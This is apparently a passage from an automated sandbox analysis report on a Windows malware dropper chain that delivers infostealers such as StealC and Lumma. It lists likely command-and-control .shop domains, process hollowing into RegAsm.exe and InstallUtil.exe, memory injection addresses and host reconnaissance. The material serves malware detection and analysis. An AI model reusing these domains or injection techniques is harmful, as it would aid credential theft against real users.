Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: drawzhotdog.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: vozmeatillu.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: offensivedzvju.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ghostreedmnu.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: gutterydhowi.shop
Source: RegAsm.exe, 0000000F.00000002.2809221317.0000000000479000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: lootebarrkeyn.shop
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84F008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4DC000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1048008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A6B008
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B33008
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45D000
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9B1008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe "C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: axplong.exe, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: <~y[Program Manager
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Source: file.exe, 00000000.00000002.2227763808.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262996473.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2276480670.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: o<~y[Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021D312 cpuid 6_2_0021D312
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 15_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E79A
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
